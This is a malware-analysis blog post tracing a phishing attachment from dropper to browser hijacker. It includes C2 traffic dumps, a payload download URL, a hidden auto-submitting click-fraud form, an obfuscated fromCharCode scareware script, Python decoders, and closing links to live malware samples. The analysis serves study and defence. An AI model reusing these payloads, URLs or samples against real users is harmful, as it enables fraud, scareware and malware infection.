
Huytebesy4ko Hijacker analysis

Continuing on the road of scam-mail-spread malware, today I am going to analyze an interesting little toy I accidentally got in touch with just yesterday, when I received this funny email at my university address from a forged sender address, notifications@crema.unimi.it:

We are contacting you in regards to an unusual activity that was identified in your mailbox. 
As a result, your mailbox has been deactivated. To restore your mailbox, you are required to 
extract and run the attached mailbox utility.

Best regards, crema.unimi.it technical support.

As you may guess, there was an attachment called utility.zip containing a utility.exe, which VirusTotal rates at 73%.

This “utility” is a simple 18k dropper, which does not harm the system much by itself, since it mostly executes a bunch of Registry queries and reads some files:

Thread ID: [ 1236 ], API Call: [ CreateFileW ]
	File: C:\DOCUME~1\Dev\IMPOST~1\Temp\1.tmp
Thread ID: [ 1236 ], API Call: [ CreateFileW ]
	File: C:\WINDOWS\system32\svchost.exe
Thread ID: [ 1236 ], API Call: [ CreateFileW ]
	File: C:\WINDOWS\system32\svchost.exe
Thread ID: [ 1236 ], API Call: [ CreateFileW ]
	File: C:\DOCUME~1\Dev\IMPOST~1\Temp\1.tmp

And spawns an instance of:

Thread ID: [ 1236 ], API Call: [ CreateProcessA ]
	Executable: [  ], Commandline: [ svchost.exe ]

As with any common dropper, the interesting part of its activity comes from the network dump analysis: as a first step it makes an HTTP GET request to a Ukrainian server:

GET /limpopo/bb.php?id=654839857&v=200&tm=5&b=4316315581 HTTP/1.1
User-Agent: Opera\9.64
Host: 193.104.27.91

HTTP/1.1 200 OK
Date: Wed, 18 Nov 2009 21:19:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 91
Connection: close
Content-Type: text/html; charset=UTF-8

[info]runurl:http://promed-net.com/css/derce2.exe|taskid:13|delay:45|upd:0|backurls:[/info]

The PHP application located at limpopo/bb.php returns the URL of another malware to be downloaded and executed, and so the dropper does:

GET /css/derce2.exe HTTP/1.1
User-Agent: Opera\9.64
Host: promed-net.com

HTTP/1.1 200 OK
Date: Wed, 18 Nov 2009 14:28:12 GMT
Server: Apache
Last-Modified: Wed, 18 Nov 2009 08:22:49 GMT
ETag: "965f23-7e00-4b03aed9"
Accept-Ranges: bytes
Content-Length: 32256
Content-Type: application/octet-stream

[...]

Here the dropper ceases its activity and leaves the stage to the newly downloaded malware, which, according to VirusTotal, has a poor detection rate (24%).
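The check-in request and the [info]...[/info] task reply shown above are simple enough to parse mechanically, which is handy when sifting a network capture for further beacons of this dropper. The following is an added example (not the dropper's or the blog's code) built only from the request line, User-Agent and reply body captured on this page; the values are copied from the dump, the function names are my own.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed from the traffic captured on the page (not the dropper's own code).
BEACON_LINE = "GET /limpopo/bb.php?id=654839857&v=200&tm=5&b=4316315581 HTTP/1.1"
BEACON_UA = "Opera\\9.64"
TASK_BODY = ("[info]runurl:http://promed-net.com/css/derce2.exe"
             "|taskid:13|delay:45|upd:0|backurls:[/info]")


def parse_beacon(request_line):
    """Split the check-in query string into the parameters the bot reports."""
    path = request_line.split(" ")[1]
    return {k: v[0] for k, v in parse_qs(urlsplit(path).query).items()}


def parse_task(body):
    """Parse the [info]key:value|key:value[/info] reply into a dict.

    Each field is split on its first ':' only, because runurl itself
    contains '://'. An empty trailing field such as backurls (as in the
    captured reply) is kept as an empty string. taskid/delay/upd are
    numeric in the capture, so they are returned as ints.
    """
    if not (body.startswith("[info]") and body.endswith("[/info]")):
        raise ValueError("not a task reply")
    inner = body[len("[info]"):-len("[/info]")]
    task = {}
    for field in inner.split("|"):
        key, _, value = field.partition(":")
        task[key] = value
    for numeric in ("taskid", "delay", "upd"):
        if numeric in task:
            task[numeric] = int(task[numeric])
    return task


def suspicious_user_agent(ua):
    """A genuine Opera UA reads 'Opera/9.64'; the captured one uses a backslash,
    a cheap but distinctive thing to flag in proxy logs."""
    return "\\" in ua


if __name__ == "__main__":
    print(parse_beacon(BEACON_LINE))
    print(parse_task(TASK_BODY))
    print("odd UA:", suspicious_user_agent(BEACON_UA))
```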

This time the sample is way more complicated and versatile: it makes extensive use of Registry calls, the most important of which create the parameters for loading itself at boot time.
It operates on the following files:

Thread ID: [ 1336 ], API Call: [ CreateFileA ]
	File: C:\DOCUME~1\Dev\IMPOST~1\Temp\rundll32.dll
Thread ID: [ 1336 ], API Call: [ CreateFileW ]
	File: C:\DOCUME~1\Dev\IMPOST~1\Temp\rundll32.dll
Thread ID: [ 1428 ], API Call: [ CreateFileA ]
	File:
Thread ID: [ 1428 ], API Call: [ CreateFileW ]
	File: C:\WINDOWS\system32\calc.dll
Thread ID: [ 1428 ], API Call: [ CreateFileA ]
	File:
Thread ID: [ 1428 ], API Call: [ CreateFileW ]
	File: C:\WINDOWS\system32\calc.dll

And spawns the following processes:

Thread ID: [ 1336 ], API Call: [ CreateProcessA ]
	Executable: [  ], Commandline: [  ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\verclsid.exe ], Commandline: [ / ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\reg.exe ], Commandline: [ " ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\verclsid.exe ], Commandline: [ / ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\reg.exe ], Commandline: [ " ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\verclsid.exe ], Commandline: [ / ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\reg.exe ], Commandline: [ " ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\verclsid.exe ], Commandline: [ / ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\reg.exe ], Commandline: [ " ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\cmd.exe ], Commandline: [ " ]

There was no evidence of remotely created threads, even though it is highly likely given the nature of its activity.

This malware generates very extensive network activity, acting on multiple fronts with multiple illegal activities and frauds.
Essentially it intercepts HTTP requests and hijacks them through a remote controller located at:
http://www.huytebesy4ko.net
which provides several possible operations to be carried out, from click fraud to scareware deployment.

That website is used to randomly launch a specific activity, hijacking the legitimate traffic with other requests such as:

GET /?do=search&q=Click%20here%20to%20view%20your%20files. HTTP/1.0
Host: huytebesy4ko.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: bbbbbbbbbate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: [HIJACKED WEBSITE]
Cookie: PHPSESSID=d48e6dd1492885258dafb9adcfe0c32e

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2009 15:52:55 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Length: 1625

Which retrieves:

<html>
<body>
<div style="display:none">
<form id="sub" name="sub" style="display:none" method="GET">

<input name="do" value="click">
<input name="url" value="http://64.111.196.117/c.php?s=eNo1lMvOsswWhC-I5O1umgZ68A0UEFAEBQ
RksmPTHJSDggpKuPjfyR5UalSpStbKc10QVam8iHjZ3wyywD8IIfq_iRBShJAKKZGRuPC2afj079_CoShSfOGc8YLAS4EVVeY5ln7KOETsf
xfCVY5yrCgFx4iohCoS40SihazmRBEXLC94yd0HP9HXV7qVR5C-SKh9VshZR_0Fu_6doaYMYh5u5FoxOv2xXa1XqlkAtNMy4s2xl7ybsUMt
ToRQzS2swrBAU28DPgnK3eoKkcWZpysKKoB87_qgbKTzWLzOw0g3b_db142NkahuUdCz9JmuBBhXn_v98-5Ljz-lGhjmXpEv5FLuP68Kfq6
poRaqdLHylD5Ah8pwB9kL6Kw8lS-m1XxvNdfH6_0YZ7_9VQXGYD0P66dtH5nXSw29k8OQ7IwX3iXCI9bR4Tkf2uKYzPkm05GfdBrfQ8Puai
9b3-CtbNNEKNebLDilW0km-bdZsy9phk3IrmMnrKdO3ugiHOP0fG9Imokl8uq6Pc_fXTE1XfRe9yaXEl_ZM-5m38EWD-mpL4TPFidNVqqim
K9vQh5owenYGhFdPYTQavy4iWEhrNkORjG6P_pD4ZpaBYSt-25PKz5hTdfUy40To33Jk__N-7alEgP9EwIcRe1B6LUyRWyLkFzRR3veoW-C
7GqrD-ewdtn3N3syPLfmJR6BOJyw3EfTOrYOSnbt5pOdDZMRrkqjxMq49TTfxlR3UH-1Q3BSihKQl1nw2vM7Zhqp6WvklZzYLcRjGOL8WWk
Wl0iYGFq9HTL6QSq2sjAXrQk_HSAQqgNgihuWGN-0TAxga_MYJc5pJzDjfFS9Y5Pkmd4dIxDt4dqh1fy4gbmZz34H3NHUyqPgO5-83VuPoD
6D46W761noVnhoNbUpPWqOMDzuhWP0tAPhjA8Aw7Oa2eJGuZR6PHqKBaZ5mDD4-LSLJytwsHAdJ2ts7NZ3pEbeRjvoi4lb608g9VnF5Fzd2
MF1wLNZeNWO3lvIiw0rwOAfwNCUg6Lh3W12jsnvWE5aFeP-IKiN3MVbqjIcM70Szd_Ty3JMnOndgUgqPhUVnHf7xfuC0OwrvJ9A9e-9MnKn
LSlYNZL3TnzBSVlnCi56G64k3adeYQ_y1vNdPUVBoDz9QOjTIXcpN06pmhdTDGIDEAUJXjzKcwGqjVB0o6RvD2_PKH_sUMU_Iv0hLP8hUVo
Wmf7J5E-Cf6K8wGURFxY3t6ylMxNT6LTuyAJasc5__ODz5cn-34IgUqC6IFVE6i8CfyC5WBHhZnRNE5e45mt0WtLw1a-MyPCS5VQlkMhUKl
AOcxmhDPGcIZwX_D91Fpn1">
</form>
</div>
<script>

document.getElementById('sub').submit();
</script>
</body>
</html>

This results in another request, pointing to a subdomain of what seems to be a pay-per-click advertising company named NDot.com, which is answered as follows:

GET /clickn.php?fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qRTRPbnR6T2pnNkltWmxaV1JmYzJWMElqd
HpPakU2SWpJaU8zTTZOem9pYzNWaVlXWm1kQ0k3Y3pvek9pSXlNVGtpTzNNNk56b2liR2x6ZEY5cFpDSTdjem96TWpvaU0ySm
1ORFpqTjJVMU16UTVOVGc0WXprNVlqQXhaRFpqWm1SalpqRm1NV1FpTzNNNk9Eb2lZMnhwWTJ0ZmFXUWlPM002TXpJNkltUXl
OemN5WWpFelpUUmxZekprTVRkbU5UVXhaV1pqWTJGaU1UTTVPVEkwSWp0ek9qazZJbXhwYzNSZmRHbHRaU0k3Y3pveE9Ub2lN
akF3T1MweE1TMHhPQ0F3T1RvMU9Ub3dPQ0k3Y3pvek9pSjFjbXdpTzNNNk5EUTZJbWgwZEhBNkx5OXRkV2Q1Y21FdWIzSm5MM
04xZEhKaEwybHVMbU5uYVQ4eE5UMG1TVVE5TVRBMU1qZ3pJanR6T2pRNkltdHdjR2tpTzNNNk5Ub2lNVGMzT0RNaU8zTTZNam
9pYVdRaU8zTTZOam9pTVRBeE56QTRJanR6T2pjNkltdGxlWGR2Y21RaU8zTTZNVGs2SWtOb2IyOXpaU0I1YjNWeUlIQmhlVzF
sYm5RaU8zTTZNam9pYVhBaU8zTTZNVE02SWpneUxqVTBMakV6Tmk0eE1qUWlPM002TVRJNkltTnZkVzUwY25sZlkyOWtaU0k3
Y3pveU9pSkpWQ0k3Y3pvek9pSmhabVlpTzNNNk5qb2lNVEExTWpneklqdHpPalk2SW5OMVltRm1aaUk3Y3pveU9pSXhNU0k3Y
3pvek9pSmlhV1FpTzNNNk5Eb2lNQzR3TVNJN2N6bzNPaUp0WVhoZlkzQmpJanR6T2pRNklqQXVNREVpTzNNNk9Ub2labWw0Wl
dSZlkzQmpJanR6T2pFNklqQWlPM002TmpvaVkyRmphR1ZrSWp0cE9qQTdjem94TXpvaVlXUjJaWEowYVhObGNsOXBaQ0k3Y3p
vME9pSXhORGswSWp0OWN6b3pPaUp0WkRVaU8zTTZNekk2SWpNMk9XUm1OR1F6WldKak1EVTJOamswWWpabE5UVTNZakJpTnpO
aU5USTBJanQ5&b=MC4wMDAx&p=MA== HTTP/1.0
Host: feed.ndot.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: bbbbbbbbbate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://huytebesy4ko.net/?do=search&q=Choose%20your%20payment

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.63
Date: Wed, 18 Nov 2009 14:59:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.11
Set-Cookie: uid=41ac974bd63aa2bb05b7e9804845ab40; expires=Thu, 18-Nov-2010 14:59:23 GMT
Location: http://mugyra.org/sutra/in.cgi?15=&ID=105283&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9q
TTZlM002TWpvaWFXUWlPM002TnpvaU56VTFNRFExT0NJN2N6b3hNam9pWVdSMlpYSjBhWE5sWDJsa0lqdHpPalk2SWpFd01UY3
dPQ0k3Y3pvME9pSnJjSEJwSWp0ek9qVTZJakUzTnpneklqdDljem96T2lKdFpEVWlPM002TXpJNklqTTVZVGMyTkROa01qTmhO
R1F4Tm1JME1qSm1OREUyWXpnNVpUazFObUk1SWp0OQ%3D%3D

It also launches more harmful requests to websites specifically created and crafted for scareware deployment, used to spread spyware/adware.
An example of such a request is the following:

GET /scan1/?pid=257&engine=%3DHmz9DjuODQuMTM2LjEyNCZ0aW1lPTEyNTU1MUYONAkN HTTP/1.0
Host: today-scann.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: bbbbbbbbbate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://huytebesy4ko.net/?do=search&q=Choose%20your%20payment

Which results in a common fake scan page, generated by a nasty JavaScript String.fromCharCode evasion, as you can see:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<link href="img/style.css" rel="stylesheet" type="text/css" />

<script type="text/javascript">
var madugapa=[713,763,819,808,819,811,804,765,768,813,819,808,735,818,815,824,
822,800,817,804,735,818,802,800,813,763,750,819,808,819,811,804,765,713,763,812,
804,819,800,735,807,819,819,815,748,804,816,820,808,821,764,737,770,814,813,819,
804,813,819,748,787,824,815,804,737,735,802,814,813,819,804,813,819,764,737,819,
804,823,819,750,807,819,812,811,762,735,802,807,800,817,818,804,819,764,788,787,
773,748,759,737,750,765,713,763,818,802,817,808,815,819,735,819,824,815,804,764,
737,819,804,823,819,750,809,800,821,800,818,802,817,808,815,819,737,735,818,817,
802,764,737,808,812,806,750,809,816,820,804,817,824,749,809,818,737,765,763,750,
818,802,817,808,815,819,765,713,763,818,802,817,808,815,819,735,819,824,815,804,
764,737,819,804,823,819,750,809,800,821,800,818,802,817,808,815,819,737,735,818,
817,802,764,737,808,812,806,750,809,816,820,804,817,824,748,808,813,808,819,749,
809,818,737,765,763,750,818,802,817,808,815,819,765,713,763,818,802,817,808,815,

[ A loooooooooooot more similar lines ]

735,817,804,812,814,821,804,735,819,807,808,818,735,819,807,817,804,800,819,735,
800,818,735,818,814,814,813,735,800,818,735,815,814,818,818,808,801,811,804,736,
735,735,735,735,735,735,763,750,803,808,821,765,713,735,735,735,735,735,735,735,
735,763,803,808,821,735,818,819,824,811,804,764,737,815,800,803,803,808,813,806,
748,819,814,815,761,735,756,751,815,823,762,735,815,800,803,803,808,813,806,748,
811,804,805,819,761,735,756,760,751,815,823,762,737,765,763,800,735,807,817,804,
805,764,737,750,803,814,822,813,811,814,800,803,749,815,807,815,766,808,803,764,
753,756,758,737,765,773,820,811,811,735,818,824,818,819,804,812,735,802,811,804,
800,813,820,815,763,750,800,765,763,750,803,808,821,765,713,735,735,763,750,803,
808,821,765,713,763,750,803,808,821,765,713,763,818,802,817,808,815,819,735,811,
800,813,806,820,800,806,804,764,737,809,800,821,800,818,802,817,808,815,819,737,
735,818,817,802,764,737,808,812,806,750,806,804,814,808,815,749,809,818,737,765,
763,750,818,802,817,808,815,819,765,713,763,750,801,814,803,824,765,763,750,807,
819,812,811,765,737];
var vazanugumyp='';
var dyje='';
for (i=0; i<madugapa.length; i++){
dyje=madugapa[i]-703;
vazanugumyp=vazanugumyp+String.fromCharCode(dyje);
}
document.write(vazanugumyp);
</script>

Which simply results in the well-known XP-like scareware pages:
http://playhack.net/wp-content/uploads/2009/11/scareware_1.png

Special gift for you!
http://playhack.net/wp-content/uploads/2009/11/scareware_2.png
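The fromCharCode loop above is trivial to undo statically: every number is a character code plus a fixed offset (703 here). The following is an added example of mine, not code from the scareware page or the blog, that reads the array name and the offset out of the script text itself, so it also works on sibling samples that rename the variables or change the constant. The embedded script is the captured one with the array cut down to its first 116 values, which is enough to recover the page title and meta tag.

```python
import re

# Constructed sample: the opening of the captured script, with the numeric array
# cut down to its first 116 values (the page's array runs for many more lines).
SAMPLE_SCRIPT = """
var madugapa=[713,763,819,808,819,811,804,765,768,813,819,808,735,818,815,824,
822,800,817,804,735,818,802,800,813,763,750,819,808,819,811,804,765,713,763,812,
804,819,800,735,807,819,819,815,748,804,816,820,808,821,764,737,770,814,813,819,
804,813,819,748,787,824,815,804,737,735,802,814,813,819,804,813,819,764,737,819,
804,823,819,750,807,819,812,811,762,735,802,807,800,817,818,804,819,764,788,787,
773,748,759,737,750,765,713,763,818,802,817,808,815,819,735,819,824,815,804,764];
var vazanugumyp='';
var dyje='';
for (i=0; i<madugapa.length; i++){
dyje=madugapa[i]-703;
vazanugumyp=vazanugumyp+String.fromCharCode(dyje);
}
document.write(vazanugumyp);
"""


def decode_charcode_script(script):
    """Statically recover what an 'array element minus constant' fromCharCode
    loop would document.write, without executing any JavaScript.

    The array name and the subtracted constant are taken from the script, so
    the same routine decodes other samples of this family that change both.
    """
    array = re.search(r"var\s+(\w+)\s*=\s*\[([\d,\s]+)\]", script)
    if array is None:
        raise ValueError("no numeric array found")
    name, body = array.group(1), array.group(2)
    codes = [int(n) for n in body.split(",") if n.strip()]
    # The loop body subtracts a fixed offset from every element before fromCharCode.
    offset = re.search(re.escape(name) + r"\[\w+\]\s*-\s*(\d+)", script)
    if offset is None:
        raise ValueError("no offset subtraction found")
    return "".join(chr(c - int(offset.group(1))) for c in codes)


if __name__ == "__main__":
    print(decode_charcode_script(SAMPLE_SCRIPT))
```

On this prefix the decoder yields the start of the fake scanner's markup, a <title>Anti spyware scan</title> line followed by the charset meta tag, which is what the browser would have written into the page.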

That today-scann.com page is not the only one: the attack platform has plenty of fresh scareware addresses to rely on!
Huytebesy4ko.net has already been known to the community for almost a week now, but it was really funny and interesting to see its spreading method; I’m pretty sure that its nasty activity is not limited to what is exposed in this post, since it seems to be part of a large network of cybercrime websites.

For your own fun, I arranged the downloads at the following addresses:
- Sasfis Dropper
http://mw.playhack.net/collection/eec53e2239800e5d85b6b85d5e2451cb.zip
- Huytebesy4ko Hijacker
http://mw.playhack.net/collection/8f55eeba46fec5a5cccd3fc0f75027ce.zip

Bye